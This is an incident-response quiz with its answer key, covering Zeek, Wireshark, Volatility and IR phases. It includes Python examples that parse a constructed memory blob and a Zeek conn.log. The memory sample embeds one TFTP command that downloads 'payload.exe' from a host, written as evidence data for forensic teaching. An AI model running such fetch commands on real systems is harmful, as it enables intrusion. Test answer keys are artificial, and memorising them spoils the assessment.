Understanding the Incident Response process and tools quiz

Question 1

Which Zeek log file would you query to find information about resolved websites from the computers on the network?

Solution

dns.log

Question 2

You have been given a PCAP file and asked to analyze it. The customer has informed you that a malicious file was probably transferred into the environment during the breach in question. You also see evidence in the memory dump from the suspected breached machine that the attacker used the built-in Windows TFTP client to transfer a file down to the suspected breached machine. How would you extract this file transferred via TFTP from the traffic capture (PCAP) file in Wireshark? You are using Wireshark version 2.3.4 or later.

Solution

With the PCAP open in Wireshark, select File -> Export objects -> TFTP then select the suspect files.

Question 3

You have been hired to help respond to an incident. Once on the site, you are made aware that there is one system on the network which has been identified as compromised. The customer also informs you there's no traffic captures related to the device. Upon investigating the system, you discover that there is an unknown process running on it. You would like to extract the process/application and see what it does. What would be the BEST course of action?

Solution
  • Perform a memory dump, then use the procdump feature of Volatility to dump the process to a file. Take the dumped process and run it in an isolated sandbox VM that's not connected to anything else

Dumping the process to a file and examining it in a sandbox is the best answer. Uploading the dump to virustotal.com is a bad choice: the sample becomes available to other subscribers, so any data the process harvested from the internal network or from that device is effectively disclosed, and an attacker watching the platform learns that the tool has been found. Installing additional software such as an intrusive monitoring agent on the compromised host could destroy evidence as well as alert the threat actor to your activity. It is never a good idea to run potentially malicious or unknown software on other production devices.

Question 4

You are examining a memory dump from a compromised machine and would like to see a breakdown of parent/child relationships of currently running processes. Which Volatility plugin would show this?

Solution
  • pstree

The pstree plugin shows processes in a tree format, emphasizing each process's relationship to its parent. The pslist plugin lists running processes but does not show the parent/child relationship as a tree. The rel and hives options are not real plugins.

Question 5

You have just been called in as an outside expert to help an organization with a data breach. They have not started a response process yet and are wanting you to start it. From the list of options here, what would you do FIRST?

Solution
  • Ask them if they have an existing IR policy and/or playbook

One thing you never want to do is be responsible for having the organization violate its own IR policy. Therefore, it's best to find out if they have one and what it entails. Taking memory dumps is a good choice if you're only thinking in terms of technical steps; however, it's not the first thing that should happen, considering the handler may be new to the environment and internal processes and procedures. Starting triage is not a good first step. Assessing damage is not the best first step.

Question 6

Which Volatility plugin allows you to search for files in memory?

Solution

filescan

Question 7

Of the four NIST incident response life cycle steps, which would you consider things like "who can access certain information" and "whom to request the access from" to fall into?

Solution
  • Preparation

Setting up and figuring out communications paths is usually associated with preparation. Doing this activity in any of the other three steps would be too late.

Question 8

You have been given a 20 GB PCAP file of network traffic. You want to break this file down into smaller pieces to see things such as HTTP traffic and DNS traffic separated out into their own log files. What tool would you use for this?

Solution
  • Zeek

A 20 GB capture is impractical to load into Wireshark, and Wireshark does not split traffic into per-protocol log files. tcpdump can filter a capture and write out a smaller pcap, but it does not produce separate protocol logs either. Volatility is for memory forensics, not network forensics. Zeek reads the pcap once and writes http.log, dns.log, conn.log and so on.

Question 9

Which Volatility plugin would you use to find current and previous network connections for the machine you got the memory dump from?

Solution
  • netscan

The sockscan and connections plugins only apply to Windows XP/2003 images: sockscan lists open sockets and connections lists only the TCP connections that were active when the image was taken. cmdscan recovers previously run console commands, not network state. netscan (Vista and later) walks the network objects still resident in memory and reports listeners, established connections, and closed endpoints that have not yet been overwritten, so it is the plugin that shows both current and previous connections.

Question 10

Which feature of Wireshark allows you to reconstruct an entire TCP session?

Solution

Follow TCP stream

Question 11

You are looking at live traffic using Zeek. You need to be able to see TCP session state and session history for all connections. Which zeek option/command would you invoke with zeek-cut to show this information, and which Zeek log would you run it against?

Solution

The history field (read alongside conn_state) against conn.log. Uppercase letters in history record the originator's packets and lowercase letters the responder's, so a single field tells you whether the handshake completed and who sent data.

Question 12

You have been given a memory dump to analyze for an IR case your team is working on. The person who gave you the memory dump is not sure of what the operating system is. What Volatility plugin allows you to scan the memory dump to find the operating system?

Solution

imageinfo

Question 13

You are analyzing a packet capture and want to isolate traffic between 192.168.2.10 and 74.56.28.27. Which Wireshark display filter would give you the appropriate view of the traffic between the two?

Solution

ip.addr == 192.168.2.10 && ip.addr == 74.56.28.27

Question 14

You are analyzing a packet capture file and you want to see traffic from the IP address of 1.1.1.1 to 10.10.10.10, but only to or from port 3389. What would that Wireshark display filter look like?

Solution

ip.src == 1.1.1.1 && ip.dst == 10.10.10.10 && tcp.port == 3389

ip.src and ip.dst fix the direction, so this shows only packets sent from 1.1.1.1 to 10.10.10.10; tcp.port matches either end of the TCP header, so traffic both to and from port 3389 is included. If you also want the return traffic from 10.10.10.10, use ip.addr for both hosts instead of ip.src/ip.dst.

Question 15

What Linux command could you run against a raw memory dump and search for human-readable text?

Solution
  • strings

strings pulls runs of printable characters out of a binary file such as a raw memory dump. cat prints text files, top shows the processes using the most resources on a running Linux machine, and lsof lists the files each process has open; none of them search binary data. Note that strings defaults to single-byte (ASCII) runs; Windows memory is full of UTF-16LE text (paths, registry keys, command lines), so run it a second time with -el to catch those.
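To show why the encoding matters, here is a small strings-style scanner written for this quiz page (it is an added example, not code from the quiz or from binutils). SAMPLE_DUMP is a constructed byte blob standing in for a slice of a Windows memory image: an ASCII command line next to a UTF-16LE file path. A default ASCII scan finds the first and misses the second; a 16-bit little-endian scan (what strings -el does) finds the path.

```python
"""Minimal strings(1) clone showing ASCII vs UTF-16LE runs in a memory blob.

Added example, not from the quiz or binutils. SAMPLE_DUMP is constructed.
"""
import re

# Constructed stand-in for a few bytes of a Windows memory image: some
# non-printable bytes, an ASCII command line, then a wide (UTF-16LE) path
# as Windows stores it internally.
SAMPLE_DUMP = (
    b"\x00\x00\x4d\x5a\x90\x00\x03\x00"
    + b"cmd.exe /c tftp -i 10.10.10.10 GET payload.exe"
    + b"\x00\x00\xff\xfe\x01"
    + "C:\\Windows\\Temp\\payload.exe".encode("utf-16-le")
    + b"\x00\x00\x13\x37"
)


def ascii_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Runs of printable 7-bit ASCII, like a plain `strings` invocation."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def utf16le_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Runs of printable ASCII code points encoded as UTF-16LE
    (each character followed by a NUL byte), like `strings -el`."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(blob)]


def all_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Both passes together; this is what you actually want on a Windows dump."""
    return ascii_strings(blob, min_len) + utf16le_strings(blob, min_len)


if __name__ == "__main__":
    print("ASCII only  :", ascii_strings(SAMPLE_DUMP))
    print("UTF-16LE    :", utf16le_strings(SAMPLE_DUMP))
    print("both passes :", all_strings(SAMPLE_DUMP))
```

Run against a real image, pipe the output through grep for the indicators you already have (the file name from the PCAP, the TFTP server address) rather than reading it end to end; a multi-gigabyte dump yields millions of lines.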

Question 16

Which zeek-cut string would I use to see all conn.log traffic with source and destination IP and port, as well as the duration of each session?

Solution

zeek-cut id.orig_h id.orig_p id.resp_h id.resp_p duration < conn.log
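The two zeek-cut questions above (Question 11 on history/conn_state and Question 16 on the five-tuple plus duration) both rely on the same property of Zeek's logs: the #fields header names every column, so any tool can pull columns by name. The following is an added example for this page, not Zeek project code, that does what zeek-cut does in Python and then interprets the history field. SAMPLE_CONN_LOG is a constructed three-record conn.log in Zeek's default TSV layout; unset fields are "-" exactly as in a real log, which is why duration must be checked before converting it to a number.

```python
"""zeek-cut-style column extraction and history decoding for a Zeek conn.log.

Added example, not Zeek code. SAMPLE_CONN_LOG is a constructed excerpt.
"""

SAMPLE_CONN_LOG = (
    "#separator \\x09\n"
    "#set_separator\t,\n"
    "#empty_field\t(empty)\n"
    "#unset_field\t-\n"
    "#path\tconn\n"
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice"
    "\tduration\tconn_state\thistory\n"
    "#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring\tinterval\tstring\tstring\n"
    "1697040000.123456\tCa1b2c\t192.168.2.10\t51234\t74.56.28.27\t443\ttcp\tssl"
    "\t12.5\tSF\tShADadFf\n"
    "1697040001.000000\tCd3e4f\t192.168.2.10\t51235\t10.10.10.10\t3389\ttcp\t-"
    "\t-\tS0\tS\n"
    "1697040002.500000\tCg5h6i\t192.168.2.11\t53\t8.8.8.8\t53\tudp\tdns"
    "\t0.02\tSF\tDd\n"
    "#close\t2023-10-11-17-00-05\n"
)

# Zeek history letters; uppercase = originator, lowercase = responder.
HISTORY_LETTERS = {
    "s": "SYN (no ACK)", "h": "SYN+ACK", "a": "pure ACK", "d": "payload data",
    "f": "FIN", "r": "RST", "c": "bad checksum", "g": "content gap",
    "t": "retransmission", "w": "zero window", "i": "inconsistent packet",
    "q": "multi-flag packet",
}


def zeek_cut(log: str, *fields: str) -> list[list[str]]:
    """Return the named columns of every record, in the order requested,
    like `zeek-cut f1 f2 ... < conn.log`. Header and #close lines are skipped."""
    col_index = None
    rows = []
    for line in log.splitlines():
        if line.startswith("#fields"):
            names = line.split("\t")[1:]
            col_index = {name: i for i, name in enumerate(names)}
            continue
        if not line or line.startswith("#"):
            continue
        if col_index is None:
            raise ValueError("record seen before the #fields header")
        cols = line.split("\t")
        try:
            rows.append([cols[col_index[f]] for f in fields])
        except KeyError as missing:
            raise KeyError(f"field {missing} is not in the #fields header") from None
    return rows


def describe_history(history: str) -> list[str]:
    """Expand a history string such as 'ShADadFf' into who-did-what steps."""
    steps = []
    for ch in history:
        if ch == "^":
            steps.append("direction flipped")
            continue
        who = "orig" if ch.isupper() else "resp"
        steps.append(f"{who} {HISTORY_LETTERS.get(ch.lower(), 'unknown ' + ch)}")
    return steps


def half_open_attempts(log: str) -> list[list[str]]:
    """Connections that got a SYN and nothing back (conn_state S0); scans and
    beacons to a dead C2 host look like this."""
    rows = zeek_cut(log, "id.orig_h", "id.resp_h", "id.resp_p", "conn_state", "history")
    return [row for row in rows if row[3] == "S0"]


def total_duration(log: str) -> float:
    """Sum of duration over records where it is set ('-' means unset)."""
    return sum(float(d) for (d,) in zeek_cut(log, "duration") if d != "-")


if __name__ == "__main__":
    for row in zeek_cut(SAMPLE_CONN_LOG, "id.orig_h", "id.orig_p",
                        "id.resp_h", "id.resp_p", "duration"):
        print("\t".join(row))
    for state, hist in zeek_cut(SAMPLE_CONN_LOG, "conn_state", "history"):
        print(state, hist, "->", "; ".join(describe_history(hist)))
    print("half-open:", half_open_attempts(SAMPLE_CONN_LOG))
```

On a real host you would still reach for zeek-cut itself; the value of writing it out is seeing that conn_state S0 with history S is a one-way SYN, while SF with ShADadFf is a full handshake, data in both directions, and a clean teardown.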

Question 17

What volatility feature allows you to extract executable binaries from memory dumps?

Solution

procdump

Question 18

What common hacker/pentest tool would you use to see if known malware ports are still open on devices in your network after you've performed eradication?

Solution

nmap

Question 19

In which phase of IR does the process of making sure the threat can no longer spread happen?

Solution

Containment

Question 20

Which factors have contributed to hard drives being less and less of a source of data breach evidence? (Select TWO)

Solution
  • Rapid adoption of cloud services.

  • Attackers evolving to using fileless malware and "living off the land" without dropping binaries on the hard drive.
